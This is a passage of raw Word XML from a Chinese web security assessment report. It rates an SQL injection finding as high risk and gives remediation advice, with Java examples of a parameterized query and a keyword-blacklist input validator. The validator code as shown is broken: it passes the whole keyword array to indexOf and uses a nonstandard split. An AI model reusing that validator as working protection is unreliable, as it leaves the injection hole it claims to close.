        <w:t>Havij</w:t>
      </w:r>
      <w:r w:rsidR="00963088" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r w:rsidR="00963088" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248E3E2E" w14:textId="77777777" w:rsidR="00A944EF" w:rsidRPr="00020762" w:rsidRDefault="00A944EF" w:rsidP="00020762">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF43317" w14:textId="6456471B" w:rsidR="00A944EF" w:rsidRPr="00020762" w:rsidRDefault="00963088" w:rsidP="00020762">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：存在</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入，无论能否爆出数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311DFFD8" w14:textId="77777777" w:rsidR="00D47F25" w:rsidRPr="00020762" w:rsidRDefault="00A944EF" w:rsidP="00020762">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="00D47F25" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="00D47F25" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入的主要原因是程序没有严格过滤用户输入的数据，导致非法数据侵入系统。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66ECD2B0"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对用户输入的特殊字符进行严格过滤，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&g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amp;</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and</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>union</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265BA63F"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使用参数化查询（</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Pre</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>paredStatement</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），避免将未经过滤的输入直接拼接到</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询语句中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25057F7A"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lastRenderedPageBreak/>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用中用于连接数据库的用户与数据库的系统管理员用户的权限有严格的区分（如不能执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>drop</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等），并设置</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用中用于连接数据库的用户不允许操作其他数据库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF834D3"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设置</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用中用于连接数据库的用户对</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录不允许有写权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730F63C2"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rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>应用防火墙</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3072F2E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以下给出</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入防范编码供开发者参考：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DD514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方法一：</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>参数化查询</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>PreparedStatement</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象的</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法给</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>赋值</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数化</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>查询强制要求</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>给</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>每个</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>定义</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>方式使得数据库能够区分出</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>哪些属于</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>代码段哪些属于数据段。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7983BD99" w14:textId="77777777" w:rsidR="00D47F25" w:rsidRPr="00020762" w:rsidRDefault="00D47F25" w:rsidP="00020762">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="250" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8080"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D47F25" w:rsidRPr="00020762" w14:paraId="496C639C" w14:textId="77777777" w:rsidTr="003E6696">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D883F"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String custname = request.getParameter("customerName"); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7830C7DA"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String query = "SELECT account_balance FROM user_data WHERE user_name = ? "; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="026FF6C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PreparedStatement pstmt = connection.prepareStatement( query );</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C5AD815"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pstmt.setString( 1, custname); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6420626A"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ResultSet results = pstmt.executeQuery( );</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E362F1D"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方法二：输入合法性</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>验证。</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>输入字符串中是否包含</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>敏感</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>，是否包含</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键字</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>、是否是</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>典型</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>语句。</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查到</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>非法字符之后，可以直接结束</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>查询</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并返回告警，也可以把非法字符替换为空或进行其他形式的修正。需要</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>注意的是这种防御方式</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>可靠性</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建立</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目前</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>情况下</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>无法</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造绕过</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>合法性验证的恶意</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBA446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通用的</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>QL</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句合法性验证如下：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="250" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8080"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D47F25" w:rsidRPr="00020762" w14:paraId="224D0F67" w14:textId="77777777" w:rsidTr="003E6696">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DEE73B"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public static boolean sql_inj(String str)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D5984AC"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E4383D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String inj_str = "'|and|exec|insert|select|delete|update|</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F25A24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count|*|%|chr|mid|master|truncate|char|declare|;|or|-|+|,";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21CF4919"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String inj_stra[] = split(inj_str,"|");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28340C9D"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for (int i=0 ; i &lt; inj_stra.length ; i++ )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FD4B64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lastRenderedPageBreak/>
              <w:t xml:space="preserve">    {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E61BA6D"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if (str.indexOf(inj_stra)&gt;=0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1639D28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434E19E0"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return true;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26436CE2"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03B4F10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4F8F1B44"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return false;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4015E05C"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B571822" w14:textId="5FCD8710" w:rsidR="00A944EF" w:rsidRDefault="00D47F25" w:rsidP="00020762">
      <w:pPr>
